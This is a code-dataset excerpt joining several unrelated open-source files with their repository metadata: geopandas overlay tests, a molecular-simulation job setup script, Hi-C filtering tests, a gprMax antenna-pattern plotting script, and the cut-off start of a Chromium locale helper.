if not exp.empty:
exp.to_file('polys_{p}_{s}.geojson'.format(p=p, s=s),
driver='GeoJSON')
for p in params:
for s in stricts:
exp = gpd.overlay(df1, df3, how=p, keep_geom_type=s)
if not exp.empty:
exp.to_file('poly_line_{p}_{s}.geojson'.format(p=p, s=s),
driver='GeoJSON')
for p in params:
for s in stricts:
exp = gpd.overlay(df1, df4, how=p, keep_geom_type=s)
if not exp.empty:
exp.to_file('poly_point_{p}_{s}.geojson'.format(p=p, s=s),
driver='GeoJSON')
"""
polys1 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": polys1})
polys2 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df2 = GeoDataFrame({"geometry": polys2, "col2": [1, 2, 3]})
lines1 = GeoSeries(
[LineString([(2, 0), (2, 4), (6, 4)]), LineString([(0, 3), (6, 3)])]
)
df3 = GeoDataFrame({"col3": [1, 2], "geometry": lines1})
points1 = GeoSeries([Point((2, 2)), Point((3, 3))])
df4 = GeoDataFrame({"col4": [1, 2], "geometry": points1})
if geom_types == "polys":
result = overlay(df1, df2, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "poly_line":
result = overlay(df1, df3, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "poly_point":
result = overlay(df1, df4, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "line_poly":
result = overlay(df3, df1, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "point_poly":
result = overlay(df4, df1, how=how, keep_geom_type=keep_geom_type)
try:
expected = read_file(
os.path.join(
DATA,
"strict",
"{t}_{h}_{s}.geojson".format(t=geom_types, h=how, s=keep_geom_type),
)
)
# the order depends on the spatial index used
# so we sort the resultant dataframes to get a consistent order
# independently of the spatial index implementation
assert all(expected.columns == result.columns), "Column name mismatch"
cols = list(set(result.columns) - set(["geometry"]))
expected = expected.sort_values(cols, axis=0).reset_index(drop=True)
result = result.sort_values(cols, axis=0).reset_index(drop=True)
assert_geodataframe_equal(
result,
expected,
normalize=True,
check_column_type=False,
check_less_precise=True,
check_crs=False,
check_dtype=False,
)
except DriverError: # fiona >= 1.8
assert result.empty
except OSError: # fiona < 1.8
assert result.empty
def test_mixed_geom_error():
polys1 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": polys1})
mixed = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
LineString([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
dfmixed = GeoDataFrame({"col1": [1, 2], "geometry": mixed})
with pytest.raises(NotImplementedError):
overlay(df1, dfmixed, keep_geom_type=True)
def test_keep_geom_type_error():
gcol = GeoSeries(
GeometryCollection(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
LineString([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
)
dfcol = GeoDataFrame({"col1": [2], "geometry": gcol})
polys1 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": polys1})
with pytest.raises(TypeError):
overlay(dfcol, df1, keep_geom_type=True)
def test_keep_geom_type_geometry_collection():
# GH 1581
df1 = read_file(os.path.join(DATA, "geom_type", "df1.geojson"))
df2 = read_file(os.path.join(DATA, "geom_type", "df2.geojson"))
with pytest.warns(UserWarning, match="`keep_geom_type=True` in overlay"):
intersection = overlay(df1, df2, keep_geom_type=None)
assert len(intersection) == 1
assert (intersection.geom_type == "Polygon").all()
intersection = overlay(df1, df2, keep_geom_type=True)
assert len(intersection) == 1
assert (intersection.geom_type == "Polygon").all()
intersection = overlay(df1, df2, keep_geom_type=False)
assert len(intersection) == 1
assert (intersection.geom_type == "GeometryCollection").all()
def test_keep_geom_type_geometry_collection2():
polys1 = [
box(0, 0, 1, 1),
box(1, 1, 3, 3).union(box(1, 3, 5, 5)),
]
polys2 = [
box(0, 0, 1, 1),
box(3, 1, 4, 2).union(box(4, 1, 5, 4)),
]
df1 = GeoDataFrame({"left": [0, 1], "geometry": polys1})
df2 = GeoDataFrame({"right": [0, 1], "geometry": polys2})
result1 = overlay(df1, df2, keep_geom_type=True)
expected1 = GeoDataFrame(
{
"left": [0, 1],
"right": [0, 1],
"geometry": [box(0, 0, 1, 1), box(4, 3, 5, 4)],
}
)
assert_geodataframe_equal(result1, expected1)
result1 = overlay(df1, df2, keep_geom_type=False)
expected1 = GeoDataFrame(
{
"left": [0, 1, 1],
"right": [0, 0, 1],
"geometry": [
box(0, 0, 1, 1),
Point(1, 1),
GeometryCollection([box(4, 3, 5, 4), LineString([(3, 1), (3, 2)])]),
],
}
)
assert_geodataframe_equal(result1, expected1)
@pytest.mark.parametrize("make_valid", [True, False])
def test_overlap_make_valid(make_valid):
bowtie = Polygon([(1, 1), (9, 9), (9, 1), (1, 9), (1, 1)])
assert not bowtie.is_valid
fixed_bowtie = bowtie.buffer(0)
assert fixed_bowtie.is_valid
df1 = GeoDataFrame({"col1": ["region"], "geometry": GeoSeries([box(0, 0, 10, 10)])})
df_bowtie = GeoDataFrame(
{"col1": ["invalid", "valid"], "geometry": GeoSeries([bowtie, fixed_bowtie])}
)
if make_valid:
df_overlay_bowtie = overlay(df1, df_bowtie, make_valid=make_valid)
assert df_overlay_bowtie.at[0, "geometry"].equals(fixed_bowtie)
assert df_overlay_bowtie.at[1, "geometry"].equals(fixed_bowtie)
else:
with pytest.raises(ValueError, match="1 invalid input geometries"):
overlay(df1, df_bowtie, make_valid=make_valid)
def test_empty_overlay_return_non_duplicated_columns():
nybb = geopandas.read_file(geopandas.datasets.get_path("nybb"))
nybb2 = nybb.copy()
nybb2.geometry = nybb2.translate(20000000)
result = geopandas.overlay(nybb, nybb2)
expected = GeoDataFrame(
columns=[
"BoroCode_1",
"BoroName_1",
"Shape_Leng_1",
"Shape_Area_1",
"BoroCode_2",
"BoroName_2",
"Shape_Leng_2",
"Shape_Area_2",
"geometry",
],
crs=nybb.crs,
)
assert_geodataframe_equal(result, expected, check_dtype=False)
def test_non_overlapping(how):
p1 = Polygon([(0, 0), (2, 0), (2, 2), (0, 2)])
p2 = Polygon([(3, 3), (5, 3), (5, 5), (3, 5)])
df1 = GeoDataFrame({"col1": [1], "geometry": [p1]})
df2 = GeoDataFrame({"col2": [2], "geometry": [p2]})
result = overlay(df1, df2, how=how)
if how == "intersection":
expected = GeoDataFrame(
{
"col1": np.array([], dtype="int64"),
"col2": np.array([], dtype="int64"),
"geometry": [],
},
index=pd.Index([], dtype="object"),
)
elif how == "union":
expected = GeoDataFrame(
{
"col1": [1, np.nan],
"col2": [np.nan, 2],
"geometry": [p1, p2],
}
)
elif how == "identity":
expected = GeoDataFrame(
{
"col1": [1.0],
"col2": [np.nan],
"geometry": [p1],
}
)
elif how == "symmetric_difference":
expected = GeoDataFrame(
{
"col1": [1, np.nan],
"col2": [np.nan, 2],
"geometry": [p1, p2],
}
)
elif how == "difference":
expected = GeoDataFrame(
{
"col1": [1],
"geometry": [p1],
}
)
assert_geodataframe_equal(result, expected)
|
jdmcbr/geopandas
|
geopandas/tests/test_overlay.py
|
Python
|
bsd-3-clause
| 23,953
|
[
"Bowtie"
] |
5e3d575d19a5433db5eb3fc37c3f91ef98d73f5e878180e8cd08e0ec1c212097
|
#!/home/aubbwc/usr/bin/python3
# ABOUT-----------------------------------------------------------------------
# setting up jobs for Ewald alternative calculations.
# CATIONS =
# Imidazolium based: MMIM, EMIM, BMIM, HMIM, OMIM
# Pyridinum based: MPYR, EPYR, BPYR, HPYR, OPYR
# ANIONS =
# BF4, PF6, Cl, AlCl4, Al2Cl4, NO3, TfO
#
# Going to have different values for solvent-solvent cutoffs:
# 9A, 12A, 15A
#
# Alternative methods to Ewald summations:
# Shifted Force (SF) : may scale by 0.1, 0.2, 0.3
# Shifted Potential (SP) : may also scale
# Shifted Force Gradient (SFG)
# (DC)
# CHARMM
#-------------------------------------------------------------------------------
import os,sys, shutil
import subprocess
from glob import glob
from time import time
starttime = time()
# important file paths
homedir = os.getcwd()
datafiles = os.path.join(homedir, 'datafiles')
infiles = os.path.join(datafiles, 'infiles')
slvzmats = os.path.join(datafiles, 'slvzmats')
# list of cations
imid_cations = ['MMIM', 'EMIM', 'BMIM', 'HMIM', 'OMIM']
pyr_cations = ['MPYR', 'EPYR', 'BPYR', 'HPYR', 'OPYR']
# NOTE: OMIM and OPYR do not have infiles for ACL's.
# NOTE: BMIM_ACL, EMIM_ACL, and HMIM_ACL are cases which need to be handled
# differently. The OPLS_IL.par file must be changed.
# methods, scaling factors, cutoffs
methods = ['EWALD_equil', 'NOEWALD','SF', 'SF_0.1', 'SF_0.2', 'SF_0.3','SP',
'SP_0.1','SP_0.2', 'SP_0.3', 'SFG', 'DC', 'CHARMM']
cutoffs = ['9A', '12A', '15A']
def filesToCopy(cation, anion):
infile = glob(str( infiles + '/' + cation + '+' + anion + '-'))[0]
dummy = os.path.join(datafiles,'dummy.z')
liqpar = os.path.join(datafiles,'liqpar')
liqcmd = os.path.join(datafiles,'liqcmd')
# need to handle (EMIM|BMIM|HMIM) + ACLs appropriately
liqzmat = glob(str(slvzmats + '/' + cation + '_liqzmat'))[0]
if cation == 'EMIM' or cation == 'BMIM' or cation == 'HMIM':
if anion == 'ACL4' or anion == 'ACL7':
liqzmat = glob(str(slvzmats +'/'+ cation +'-ACL_liqzmat'))[0]
cshfile = os.path.join(datafiles, 'IL_ewald.csh')
ILpar = os.path.join(datafiles, 'IL-OPLS.par')
ILsb = os.path.join(datafiles, 'IL-OPLS.sb')
return [infile, dummy, liqpar, liqcmd, liqzmat, cshfile, ILpar, ILsb]
def sed(textToReplace, replacementText, filename):
filecontents = open(filename, 'r').read()
newcontents = filecontents.replace(textToReplace, replacementText)
file = open(filename, 'w')
file.write(newcontents)
file.close()
# ICUTAS ARRAYS
icutas = {'EMIM':' 0 0 5 17 6 10 0 0',
'MMIM':' 0 0 6 11 6 10 0 0',
'BMIM':' 0 0 5 24 11 6 10 0',
'HMIM':' 0 0 5 30 21 11 6 10',
'OMIM':' 0 0 5 36 27 11 6 10',
'BPYR':' 0 0 6 23 17 6 3 0',
'EPYR':' 0 0 6 17 6 3 0 0',
'HPYR':' 0 0 6 23 17 6 3 0',
'MPYR':' 0 0 6 14 6 3 0 0',
'OPYR':' 0 0 6 23 17 6 3 0',
}
for cation in pyr_cations:
# list of anions
anions = ['BF4', 'PF6', 'Cl', 'NO3', 'TFO', 'ACL4', 'ACL7']
if cation == 'OMIM' or cation == 'OPYR':
# cations OMIM and OPYR do not have ACL anions associated with them
anions = ['BF4', 'PF6', 'Cl', 'TFO']
if cation == 'HPYR' or cation == 'OPYR':
anions = ['BF4', 'PF6', 'Cl']
for anion in anions:
for cutoff in cutoffs:
for method in methods:
pathname = os.path.join(homedir, cation, anion, cutoff, method)
print("\tBeginning %s.%s.%s.%s." %(cation, anion, cutoff,
method))
os.makedirs(pathname)
#copy all files into relevant directory
files = filesToCopy(cation,anion)
[ shutil.copy(file, pathname) for file in files ]
[ print("\t\t%s copied." % file) for file in files ]
# set the correct pathname for files
infile = os.path.join(pathname, files[0].split('/')[-1])
dummy = os.path.join(pathname, files[1].split('/')[-1])
liqpar = os.path.join(pathname, files[2].split('/')[-1])
liqcmd = os.path.join(pathname, files[3].split('/')[-1])
liqzmat = os.path.join(pathname, files[4].split('/')[-1])
cshfile = os.path.join(pathname, files[5].split('/')[-1])
ILpar = os.path.join(pathname, files[6].split('/')[-1])
ILsb = os.path.join(pathname, files[7].split('/')[-1])
# edit files accordingly
# liqpar: set icutas array and cutoff
# anions Cl, NO3, and TFO need - sign in the principal solvent
if anion == 'Cl' or anion == 'NO3' or anion == 'TFO':
sed('ANION', str(anion + '-'), liqpar)
else:
sed('ANION', anion, liqpar)
sed('icutas', icutas[cation], liqpar)
sed('XX', cutoff[:-1], liqpar)
# csh file
cshstring = str(cation +'.'+ anion +'.'+ cutoff +'.' + method)
sed('TYPE', cshstring, cshfile)
sed('LOCAL', pathname, cshfile)
sed('ANION', anion, cshfile)
# liqcmd
sed('ANION', anion, liqcmd)
# move file names to those specified in par and cmd files
# csh file
shutil.move(cshfile, os.path.join(pathname, str(cshstring +
'.csh')))
#infile
shutil.move(infile, os.path.join(pathname, 'liqin'))
# slvzmat
shutil.move(liqzmat, os.path.join(pathname, 'liqzmat'))
# OMIM and OPYR with ACL must have IL_OPLS.par params edited
if cation == 'EMIM' or cation == 'BMIM ' or cation == 'HMIM':
if anion == 'ACL4' or anion == 'ACL7':
sed('2711', '2811', ILpar)
sed('2712', '2812', ILpar)
print("\tDone with %s.%s.%s.%s.\n" % (cation, anion, cutoff,
method))
if "submit" in sys.argv:
currentdir = os.getcwd()
os.chdir(pathname)
submitcmd = glob('*csh')
subprocess.call(["/home/aubbwc/scripts/runboss", submitcmd[0]])
os.chdir(currentdir)
stoptime = time()
runtime = stoptime - starttime
print("Script" + sys.argv[0] + " completed in {x:.1f} seconds.".format( x =
runtime))
sys.exit(0)
|
thebillywayne/research_utilities
|
boss/Ewald.equil.py
|
Python
|
bsd-3-clause
| 6,692
|
[
"CHARMM"
] |
2e1fc0ea36cb3e04b7c9ac40ddb298d70468c9c5979a8747c96a87b350aca542
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from tool.tb_filter import tbFilterTool
@pytest.mark.hic
def test_tb_filter_frag_01():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_frag_02():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_01():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_02():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
|
Multiscale-Genomics/mg-process-fastq
|
tests/test_tb_filter.py
|
Python
|
apache-2.0
| 9,613
|
[
"BWA"
] |
0305b3d4858435f6ba2b8116058ab05fbe5b204d76bc6afa50b72e55bcc4ece7
|
# Copyright (C) 2016, Craig Warren
#
# This module is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License.
# To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/4.0/.
#
# Please use the attribution at http://dx.doi.org/10.1016/j.sigpro.2016.04.010
import argparse
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
from gprMax.constants import c, z0
# Parse command line arguments
parser = argparse.ArgumentParser(description='Plot field patterns from a simulation with receivers positioned in circles around an antenna. This module should be used after the field pattern data has been processed and stored using the initial_save.py module.', usage='cd gprMax; python -m user_libs.antenna_patterns.plot_fields numpyfile')
parser.add_argument('numpyfile', help='name of numpy file including path')
# parser.add_argument('hertzian', help='name of numpy file including path')
args = parser.parse_args()
patterns = np.load(args.numpyfile)
# hertzian = np.load(args.hertzian)
########################################
# User configurable parameters
# Pattern type (E or H)
type = 'H'
# Relative permittivity of half-space for homogeneous materials (set to None for inhomogeneous)
epsr = 5
# Observation radii and angles
radii = np.linspace(0.1, 0.3, 20)
theta = np.linspace(3, 357, 60)
theta = np.deg2rad(np.append(theta, theta[0])) # Append start value to close circle
# Centre frequency of modelled antenna
f = 1.5e9 # GSSI 1.5GHz antenna model
# Largest dimension of antenna transmitting element
D = 0.060 # GSSI 1.5GHz antenna model
# Minimum value for plotting energy and ring steps (dB)
min = -72
step = 12
########################################
# Critical angle and velocity
if epsr:
mr = 1
z1 = np.sqrt(mr / epsr) * z0
v1 = c / np.sqrt(epsr)
thetac = np.round(np.rad2deg(np.arcsin(v1 / c)))
wavelength = v1 / f
# Print some useful information
print('Centre frequency: {} GHz'.format(f / 1e9))
if epsr:
print('Critical angle for Er {} is {} degrees'.format(epsr, thetac))
print('Wavelength: {:.3f} m'.format(wavelength))
print('Observation distance(s) from {:.3f} m ({:.1f} wavelengths) to {:.3f} m ({:.1f} wavelengths)'.format(radii[0], radii[0] / wavelength, radii[-1], radii[-1] / wavelength))
print('Theoretical boundary between reactive & radiating near-field (0.62*sqrt((D^3/wavelength): {:.3f} m'.format(0.62 * np.sqrt((D**3) / wavelength)))
print('Theoretical boundary between radiating near-field & far-field (2*D^2/wavelength): {:.3f} m'.format((2 * D**2) / wavelength))
# Setup figure
fig = plt.figure(num=args.numpyfile, figsize=(8, 8), facecolor='w', edgecolor='w')
ax = plt.subplot(111, polar=True)
cmap = plt.cm.get_cmap('rainbow')
ax.set_prop_cycle('color', [cmap(i) for i in np.linspace(0, 1, len(radii))])
# Critical angle window and air/subsurface interface lines
if epsr:
ax.plot([0, np.deg2rad(180 - thetac)], [min, 0], color='0.7', lw=2)
ax.plot([0, np.deg2rad(180 + thetac)], [min, 0], color='0.7', lw=2)
ax.plot([np.deg2rad(270), np.deg2rad(90)], [0, 0], color='0.7', lw=2)
ax.annotate('Air', xy=(np.deg2rad(270), 0), xytext=(8, 8), textcoords='offset points')
ax.annotate('Ground', xy=(np.deg2rad(270), 0), xytext=(8, -15), textcoords='offset points')
# Plot patterns
for patt in range(0, len(radii)):
pattplot = np.append(patterns[patt, :], patterns[patt, 0]) # Append start value to close circle
pattplot = pattplot / np.max(np.max(patterns)) # Normalise, based on set of patterns
# Calculate power (ignore warning from taking a log of any zero values)
with np.errstate(divide='ignore'):
power = 10 * np.log10(pattplot)
# Replace any NaNs or Infs from zero division
power[np.invert(np.isfinite(power))] = 0
ax.plot(theta, power, label='{:.2f}m'.format(radii[patt]), marker='.', ms=6, lw=1.5)
# Add Hertzian dipole plot
# hertzplot1 = np.append(hertzian[0, :], hertzian[0, 0]) # Append start value to close circle
# hertzplot1 = hertzplot1 / np.max(np.max(hertzian))
# ax.plot(theta, 10 * np.log10(hertzplot1), label='Inf. dipole, 0.1m', color='black', ls='-.', lw=3)
# hertzplot2 = np.append(hertzian[-1, :], hertzian[-1, 0]) # Append start value to close circle
# hertzplot2 = hertzplot2 / np.max(np.max(hertzian))
# ax.plot(theta, 10 * np.log10(hertzplot2), label='Inf. dipole, 0.58m', color='black', ls='--', lw=3)
# Theta axis options
ax.set_theta_zero_location('N')
ax.set_theta_direction('clockwise')
ax.set_thetagrids(np.arange(0, 360, 30))
# Radial axis options
ax.set_rmax(0)
ax.set_rlabel_position(45)
ax.set_yticks(np.arange(min, step, step))
yticks = ax.get_yticks().tolist()
yticks[-1] = '0 dB'
ax.set_yticklabels(yticks)
# Grid and legend
ax.grid(True)
handles, existlabels = ax.get_legend_handles_labels()
leg = ax.legend([handles[0], handles[-1]], [existlabels[0], existlabels[-1]], ncol=2, loc=(0.27, -0.12), frameon=False) # Plot just first and last legend entries
# leg = ax.legend([handles[0], handles[-3], handles[-2], handles[-1]], [existlabels[0], existlabels[-3], existlabels[-2], existlabels[-1]], ncol=4, loc=(-0.13,-0.12), frameon=False)
[legobj.set_linewidth(2) for legobj in leg.legendHandles]
# Save a pdf of the plot
savename = os.path.splitext(args.numpyfile)[0] + '.pdf'
fig.savefig(savename, dpi=None, format='pdf', bbox_inches='tight', pad_inches=0.1)
# savename = os.path.splitext(args.numpyfile)[0] + '.png'
# fig.savefig(savename, dpi=150, format='png', bbox_inches='tight', pad_inches=0.1)
plt.show()
|
gprMax/gprMax
|
user_libs/antenna_patterns/plot_fields.py
|
Python
|
gpl-3.0
| 5,571
|
[
"VisIt"
] |
3e387fd1e1eb3a95167543de726591d959bf0ae7c691a4f8e296a662ffe45d57
|
#!/usr/bin/env vpython
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper script used to manage locale-related files in Chromium.
This script is used to check, and potentially fix, many locale-related files
in your Chromium workspace, such as:
- GRIT input files (.grd) and the corresponding translations (.xtb).
- BUILD.gn files listing Android localized resource string resource .xml
generated by GRIT for all supported Chrome locales. These correspond to
<output> elements that use the type="android" attribute.
The --scan-dir <dir> option can be used to check for all files under a specific
directory, and the --fix-inplace option can be used to try fixing any file
that doesn't pass the check.
This can be very handy to avoid tedious and repetitive work when adding new
translations / locales to the Chrome code base, since this script can update
said input files for you.
Important note: checks and fix may fail on some input files. For example
remoting/resources/remoting_strings.grd contains an in-line comment element
inside its <outputs> section that breaks the script. The check will fail, and
trying to fix it too, but at least the file will not be modified.
"""
from __future__ import print_function
import argparse
import json
import os
import re
import shutil
import subprocess
import sys
import unittest
# Assume this script is under build/
_SCRIPT_DIR = os.path.dirname(__file__)
_SCRIPT_NAME = os.path.join(_SCRIPT_DIR, os.path.basename(__file__))
_TOP_SRC_DIR = os.path.join(_SCRIPT_DIR, '..')
# Need to import android/gyp/util/resource_utils.py here.
sys.path.insert(0, os.path.join(_SCRIPT_DIR, 'android/gyp'))
from util import build_utils
from util import resource_utils
# This locale is the default and doesn't have translations.
_DEFAULT_LOCALE = 'en-US'
# Misc terminal codes to provide human friendly progress output.
_CONSOLE_CODE_MOVE_CURSOR_TO_COLUMN_0 = '\x1b[0G'
_CONSOLE_CODE_ERASE_LINE = '\x1b[K'
_CONSOLE_START_LINE = (
